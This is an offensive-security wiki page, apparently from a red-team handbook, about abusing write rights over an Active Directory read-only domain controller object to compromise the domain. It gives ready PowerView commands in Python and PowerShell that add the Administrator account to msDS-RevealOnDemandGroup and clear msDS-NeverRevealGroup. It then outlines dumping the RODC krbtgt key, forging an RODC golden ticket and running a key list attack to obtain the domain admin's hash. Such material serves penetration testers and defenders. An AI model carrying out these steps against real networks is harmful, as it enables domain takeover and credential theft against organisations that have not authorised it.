# Rights on RODC object

With administrative control over the [RODC](https://red.infiltr8.io/ad/movement/domain-settings/rodc) computer object in the Active Directory, there is a path to fully compromise the domain. It is possible to modify the RODC’s `msDS-NeverRevealGroup` and `msDS-RevealOnDemandGroup` attributes to allow a Domain Admin to authenticate and dump his credentials via administrative access over the RODC host.

{% hint style="info" %}
For more granularity, one of these ACEs against the RODC object is initially sufficient, since they will implicitly allow `WriteProperty` against the `msDS-RevealOnDemandGroup` and `msDS-NeverRevealGroup` attributes:

* `GenericWrite`
* `GenericAll` / `FullControl`
* `WriteDacl` (the attacker can modify the DACL and obtain arbitrary permissions)
* `Owns` (c.f. `WriteDacl`)
* `WriteOwner` (i.e. the attacker can obtain `Owns` -> `WriteDacl` -> other permissions)
* `WriteProperty` against the `msDS-RevealOnDemandGroup`attribute in conjunction with another primitive to gain privileged access to the host. `WriteProperty` against the `msDS-NeverRevealGroup` attribute may be required if it includes the target account.
  {% endhint %}

{% tabs %}
{% tab title="UNIX-like" %}
From UNIX-like systems, this [PowerView python package](https://github.com/aniqfakhrul/powerview.py) (Python) can be used to modify the LDAP attribute.

<pre class="language-bash"><code class="lang-bash"><strong>powerview "$DOMAIN"/"$USER":"$PASSWORD"@"RODC_FQDN"
</strong>
#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
#Then, append the Allowed RODC Password Replication Group group
<strong>PV > Set-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'
</strong><strong>PV > Set-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'
</strong>
#If needed, remove the admin from the msDS-NeverRevealGroup attribute
<strong>PV > Set-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup
</strong></code></pre>

Then, dump the `krbtgt_XXXXX` key on the RODC server with admin access on the host (this can be done by modifying the `managedBy` attribute for example), and use it to forge a [RODC golden ticket](https://red.infiltr8.io/ad/movement/kerberos/forged-tickets/rodc-golden-tickets) and conduct a [key list attack](https://github.com/v4resk/red-book/blob/main/ad/movement/credentials/dumping/kerberos-key-list.md) to retrieve the domain Administrator's password hash.
{% endtab %}

{% tab title="Windows" %}
From Windows systems, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (PowerShell) can be used for this purpose.

```powershell
#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
Set-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}

#If needed, remove the admin from the msDS-NeverRevealGroup attribute
Set-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'
```

Then, dump the `krbtgt_XXXXX` key on the RODC server with admin access on the host (this can be done by modifying the `managedBy` attribute for example), and use it to forge a [RODC golden ticket](https://red.infiltr8.io/ad/movement/kerberos/forged-tickets/rodc-golden-tickets) and conduct a [key list attack](https://github.com/v4resk/red-book/blob/main/ad/movement/credentials/dumping/kerberos-key-list.md) to retrieve the domain Administrator's password hash.
{% endtab %}
{% endtabs %}

## References

{% embed url="<https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06>" %}